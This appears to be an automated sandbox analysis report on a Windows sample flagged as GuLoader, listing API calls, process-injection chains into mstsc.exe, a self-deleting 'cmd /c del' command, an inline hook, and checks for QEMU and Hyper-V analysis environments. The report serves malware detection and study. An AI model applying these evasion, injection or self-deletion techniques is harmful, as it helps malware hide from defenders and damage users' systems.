Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92BC0 NtQueryInformationToken,LdrInitializeThunk,	6_2_34E92BC0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92B90 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_34E92B90
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92B10 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_34E92B10
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E934E0 NtCreateMutant,	6_2_34E934E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E94570 NtSuspendThread,	6_2_34E94570
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E94260 NtSetContextThread,	6_2_34E94260
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92CD0 NtEnumerateKey,	6_2_34E92CD0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E93C90 NtOpenThread,	6_2_34E93C90
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92C20 NtSetInformationFile,	6_2_34E92C20
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E93C30 NtOpenProcessToken,	6_2_34E93C30
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92C10 NtOpenProcess,	6_2_34E92C10
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92D50 NtWriteVirtualMemory,	6_2_34E92D50
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92EC0 NtQuerySection,	6_2_34E92EC0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92E80 NtCreateProcessEx,	6_2_34E92E80
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92E00 NtQueueApcThread,	6_2_34E92E00
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92FB0 NtSetValueKey,	6_2_34E92FB0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92F30 NtOpenDirectoryObject,	6_2_34E92F30
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E938D0 NtGetContextThread,	6_2_34E938D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E929D0 NtWaitForSingleObject,	6_2_34E929D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92AC0 NtEnumerateValueKey,	6_2_34E92AC0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92AA0 NtQueryInformationFile,	6_2_34E92AA0

Source: SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000003.2966799157.000000003529C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000002.3051285400.00000000350F0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034DD2000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034DA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SC.028UCCP.exe
Source: SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs SC.028UCCP.exe

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: SC.028UCCP.exe

Static PE information: invalid certificate

Source: SC.028UCCP.exe	Virustotal: Detection: 50%
Source: SC.028UCCP.exe	ReversingLabs: Detection: 33%

Source: C:\Users\user\Desktop\SC.028UCCP.exe

File read: C:\Users\user\Desktop\SC.028UCCP.exe

Jump to behavior

Source: SC.028UCCP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process created: C:\Users\user\Desktop\SC.028UCCP.exe C:\Users\user\Desktop\SC.028UCCP.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\SC.028UCCP.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

File created: C:\Users\user\Documents\Snarer.ini

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

File created: C:\Users\user\AppData\Local\Temp\nsl7C13.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/4@24/16

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\SC.028UCCP.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042E6

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:304:WilStaging_02

Source:	Binary string: mshtml.pdb source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SC.028UCCP.exe, SC.028UCCP.exe, 00000006.00000003.2881960130.0000000034C75000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2876852464.0000000034ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: SC.028UCCP.exe, 00000006.00000001.2747874116.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mstsc.pdb source: SC.028UCCP.exe, 00000006.00000002.3049797732.0000000034CB0000.00000040.10000000.00040000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2966799157.000000003517A000.00000004.00000020.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000003.2964883119.0000000034CBF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2936860727.000000000411D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2969977740.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2936860727.0000000002C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, type: DROPPED

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_10002CE0 push eax; ret	0_2_10002D0E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E297A1 push es; iretd	6_2_34E297A8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E221AD pushad ; retf 0004h	6_2_34E2223F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E508CD push ecx; mov dword ptr [esp], ecx	6_2_34E508D6

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EC3

Source: C:\Users\user\Desktop\SC.028UCCP.exe

File created: C:\Users\user\AppData\Local\Temp\nsc7F31.tmp\System.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE9

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\SC.028UCCP.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SC.028UCCP.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3016	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe TID: 3100	Thread sleep count: 126 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe TID: 3100	Thread sleep time: -252000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 6_2_34E91763 rdtsc

6_2_34E91763

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 881			Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe

API coverage: 1.1 %

Source: C:\Windows\SysWOW64\mstsc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405475
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_00405E9C FindFirstFileA,FindClose,	0_2_00405E9C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 0_2_0040264F FindFirstFileA,	0_2_0040264F

Source: C:\Users\user\Desktop\SC.028UCCP.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe	API call chain: ExitProcess graph end node			graph_0-4041
Source: C:\Users\user\Desktop\SC.028UCCP.exe	API call chain: ExitProcess graph end node			graph_0-4202

Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SC.028UCCP.exe, 00000006.00000002.3034808343.0000000004C47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SC.028UCCP.exe, 00000000.00000002.2999683901.0000000010059000.00000004.00000800.00020000.00000000.sdmp, SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: SC.028UCCP.exe, 00000006.00000002.3035813492.0000000006549000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405EC3

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Code function: 6_2_34E91763 rdtsc

6_2_34E91763

Source: C:\Users\user\Desktop\SC.028UCCP.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E4EF mov eax, dword ptr fs:[00000030h]	6_2_34E8E4EF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E4EF mov eax, dword ptr fs:[00000030h]	6_2_34E8E4EF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E854E0 mov eax, dword ptr fs:[00000030h]	6_2_34E854E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F4FD mov eax, dword ptr fs:[00000030h]	6_2_34F0F4FD
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E564F0 mov eax, dword ptr fs:[00000030h]	6_2_34E564F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A4F0 mov eax, dword ptr fs:[00000030h]	6_2_34E8A4F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A4F0 mov eax, dword ptr fs:[00000030h]	6_2_34E8A4F0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E794FA mov eax, dword ptr fs:[00000030h]	6_2_34E794FA
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]	6_2_34E714C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]	6_2_34E714C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]	6_2_34E714C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]	6_2_34E714C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E714C9 mov eax, dword ptr fs:[00000030h]	6_2_34E714C9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E744D1 mov eax, dword ptr fs:[00000030h]	6_2_34E744D1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E744D1 mov eax, dword ptr fs:[00000030h]	6_2_34E744D1
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7F4D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7F4D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E844A8 mov eax, dword ptr fs:[00000030h]	6_2_34E844A8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E524A2 mov eax, dword ptr fs:[00000030h]	6_2_34E524A2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E524A2 mov ecx, dword ptr fs:[00000030h]	6_2_34E524A2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDD4A0 mov ecx, dword ptr fs:[00000030h]	6_2_34EDD4A0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDD4A0 mov eax, dword ptr fs:[00000030h]	6_2_34EDD4A0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDD4A0 mov eax, dword ptr fs:[00000030h]	6_2_34EDD4A0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8E4BC mov eax, dword ptr fs:[00000030h]	6_2_34E8E4BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E50485 mov ecx, dword ptr fs:[00000030h]	6_2_34E50485
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]	6_2_34E8648A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]	6_2_34E8648A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8648A mov eax, dword ptr fs:[00000030h]	6_2_34E8648A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8B490 mov eax, dword ptr fs:[00000030h]	6_2_34E8B490
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8B490 mov eax, dword ptr fs:[00000030h]	6_2_34E8B490
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDC490 mov eax, dword ptr fs:[00000030h]	6_2_34EDC490
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F478 mov eax, dword ptr fs:[00000030h]	6_2_34F0F478
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E58470 mov eax, dword ptr fs:[00000030h]	6_2_34E58470
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E58470 mov eax, dword ptr fs:[00000030h]	6_2_34E58470
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1A464 mov eax, dword ptr fs:[00000030h]	6_2_34F1A464
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60445 mov eax, dword ptr fs:[00000030h]	6_2_34E60445
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED0443 mov eax, dword ptr fs:[00000030h]	6_2_34ED0443
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5D454 mov eax, dword ptr fs:[00000030h]	6_2_34E5D454
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8D450 mov eax, dword ptr fs:[00000030h]	6_2_34E8D450
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8D450 mov eax, dword ptr fs:[00000030h]	6_2_34E8D450
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]	6_2_34E7E45E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]	6_2_34E7E45E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]	6_2_34E7E45E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]	6_2_34E7E45E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E45E mov eax, dword ptr fs:[00000030h]	6_2_34E7E45E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]	6_2_34EDF42F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]	6_2_34EDF42F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]	6_2_34EDF42F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]	6_2_34EDF42F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDF42F mov eax, dword ptr fs:[00000030h]	6_2_34EDF42F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B420 mov eax, dword ptr fs:[00000030h]	6_2_34E4B420
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED9429 mov eax, dword ptr fs:[00000030h]	6_2_34ED9429
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E87425 mov eax, dword ptr fs:[00000030h]	6_2_34E87425
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E87425 mov ecx, dword ptr fs:[00000030h]	6_2_34E87425
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4640D mov eax, dword ptr fs:[00000030h]	6_2_34E4640D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE6400 mov eax, dword ptr fs:[00000030h]	6_2_34EE6400
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE6400 mov eax, dword ptr fs:[00000030h]	6_2_34EE6400
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F409 mov eax, dword ptr fs:[00000030h]	6_2_34F0F409
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5B5E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5B5E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E815EF mov eax, dword ptr fs:[00000030h]	6_2_34E815EF
